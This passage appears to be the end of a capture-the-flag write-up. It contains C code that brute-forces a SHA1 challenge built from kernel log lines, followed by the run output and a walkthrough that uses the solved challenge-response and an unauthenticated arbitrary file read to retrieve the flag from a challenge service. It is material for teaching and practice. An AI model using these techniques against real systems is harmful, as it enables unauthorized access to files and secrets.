    printf("Invalid target hash\n");
    exit(1);
  }

  hex_to_byte(argv[3], target_digest);
 
  printf("Start uptime=%i (hz=%i)\n", uptime, hz);
  printf("Target hash=");
  printf(byte_to_hex(target_digest));
  printf("\n");

  printf("Precalculate nanoseconds decimal representation...\n");

  for(i = 0 ; i < pow(10, 6) ; i++) {
    snprintf((char*)nano + i * 8, 7, "%0.6i", i);
  }

  printf("Bruteforcing...\n");
  while (1) {
  sprintf(log, LOG, uptime, 999999);
  log_len = strlen(log);
  for(i = 0 ; i < pow(10, 6) ; i++)
  {
     memcpy((char*)log + 9, (char*)nano + i*8, 6);
     SHA1(log, log_len, guess_digest);
     //printf("%s %s\n", log, byte_to_hex(guess_digest)); exit(0);

     if (guess_digest[0] == target_digest[0]) {
       if (memcmp(guess_digest, target_digest, SHA1_DIGEST_LENGTH) == 0)
       {
          printf("WIN %i %i %s", uptime, i, log);
          exit(0);
       }
     }
  }
  uptime+=step;
  printf("progress=%s", log);
  }

  return 0;
}

Compile and run it:

$ gcc -O3 -o bf200-fast bf200-fast.c -lcrypto
$ ./bf200-fast 1636691457 250 02b73dccde50be2c0c1639b0db4879cc86826485
Start uptime=6546165 (hz=250)
Target hash=02b73dccde50be2c0c1639b0db4879cc86826485
Precalculate nanoseconds decimal representation...
Bruteforcing...
progress=[6546165.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6546166.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6546167.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6546168.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6546169.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8...
...
progress=[6547041.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6547042.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6547043.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6547044.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6547045.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6547046.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
progress=[6547047.999999] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
WIN 6547048 854470 [6547048.854470] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8

Yeah! We found a solution, now compute the challenge response: the string in SHA512. Notice the script is so broken it's use the full sha512sum binary output, including the dash at the end of line and the carriage return.

$ echo "[6547048.854470] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8" | sha512sum
25adb71ebdc140629f3c095fc57c1afc00198deca5f1fd4a8d3022121ff3713c92683000c1f0cce4b090c1c54fae5fd5f9e900ac85ff3c014a98f8ce5683a301  -

Pwn time:

Platform debug
[1] cpu
[2] memory
[3] pci devices
[4] kernel log
[5] os version
[6] os uptime
[7] disk subsystem
[8] time settings
[9] /etc/shadow
Platform > 4
To access sensitive kernel debug info you need access to dmesg
Taking some randomness...
Challenge: 02b73dccde50be2c0c1639b0db4879cc86826485 -
Response > 25adb71ebdc140629f3c095fc57c1afc00198deca5f1fd4a8d3022121ff3713c92683000c1f0cce4b090c1c54fae5fd5f9e900ac85ff3c014a98f8ce5683a301  -
Attempting to provide kernel debug messages
=== dmesg ===
[6547042.852817] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
[6547043.853252] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
[6547044.853694] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
[6547045.853138] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
[6547046.853582] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
[6547047.854031] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
[6547048.854470] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8
[6549553.153623] UDP: bad checksum. From 46.9.163.51:12345 to 77.220.186.142:12345 ulen 8
[6550413.365523] UDP: bad checksum. From 173.70.38.82:40000 to 77.220.186.142:40000 ulen 17
MENU
[1] base station filesystem access
[2] base station network statistics
[3] base station platform debug
[0] exit
> 1
Read arbitrary file > /home/flag.txt
Auth token >
./gsmd.sh: line 25: gsmd_auth_check: command not found
Attempting to read arbitrary file
=== /home/flag.txt ===
CTF{ea0ab151a617cb0df62353a60d15679a}
Share
Tagged as: , Comments Off